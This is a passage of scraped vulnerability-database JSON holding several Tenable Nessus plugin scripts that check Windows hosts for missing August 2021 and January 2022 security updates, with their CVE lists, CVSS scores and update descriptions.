script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005031'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:18363,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005031])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005030.NASL", "href": "https://www.tenable.com/plugins/nessus/152435", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152435);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005030\");\n script_xref(name:\"MSFT\", value:\"MS21-5005030\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005030-os-build-17763-2114-cec503ed-cc09-4641-bdc1-988153e0bd9a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?34b43ea5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005030'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:17763,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005030])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:13:38", "description": "The remote Windows host is missing security update 5009621.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21850, CVE-2022-21851, CVE-2022-21893, CVE-2022-21928)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21862, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21903, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009621: Windows 7 and Windows Server 2008 R2 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21862", "CVE-2022-21880", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21893", "CVE-2022-21895", "CVE-2022-21897", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21928"], "modified": "2022-08-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009621.NASL", "href": "https://www.tenable.com/plugins/nessus/156627", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156627);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21848\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21859\",\n \"CVE-2022-21862\",\n \"CVE-2022-21880\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21893\",\n \"CVE-2022-21897\",\n \"CVE-2022-21899\",\n \"CVE-2022-21900\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\"\n );\n script_xref(name:\"MSFT\", value:\"MS22-5009610\");\n script_xref(name:\"MSFT\", value:\"MS22-5009621\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009621: Windows 7 and Windows Server 2008 R2 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009621.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21850, \n CVE-2022-21851, CVE-2022-21893, CVE-2022-21928)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21880, CVE-2022-21904, \n CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, \n CVE-2022-21924)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21862, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21903, \n CVE-2022-21908, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009621\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5009621 or Cumulative Update 5009610\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21851\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-21922\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-01';\nkbs = make_list(\n '5009621',\n '5009610'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009621, 5009610])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:17", "description": "The remote Windows host is missing security update 5009619.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21850, CVE-2022-21851, CVE-2022-21893, CVE-2022-21928)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21862, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21903, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009619: Windows Server 2012 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21862", "CVE-2022-21864", "CVE-2022-21867", "CVE-2022-21870", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21880", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21897", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928"], "modified": "2022-05-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009619.NASL", "href": "https://www.tenable.com/plugins/nessus/156626", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156626);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21848\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21862\",\n \"CVE-2022-21864\",\n \"CVE-2022-21867\",\n \"CVE-2022-21870\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21880\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21897\",\n \"CVE-2022-21899\",\n \"CVE-2022-21900\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\"\n );\n script_xref(name:\"MSKB\", value:\"5009586\");\n script_xref(name:\"MSKB\", value:\"5009619\");\n script_xref(name:\"MSFT\", value:\"MS22-5009586\");\n script_xref(name:\"MSFT\", value:\"MS22-5009619\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009619: Windows Server 2012 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009619.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21850, \n CVE-2022-21851, CVE-2022-21893, CVE-2022-21928)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, \n CVE-2022-21924)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21862, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21903, \n CVE-2022-21908, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009586\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5009619 or Cumulative Update 5009586\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21851\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-21922\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-01';\nkbs = make_list(\n '5009619',\n '5009586'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'01_2022',\n 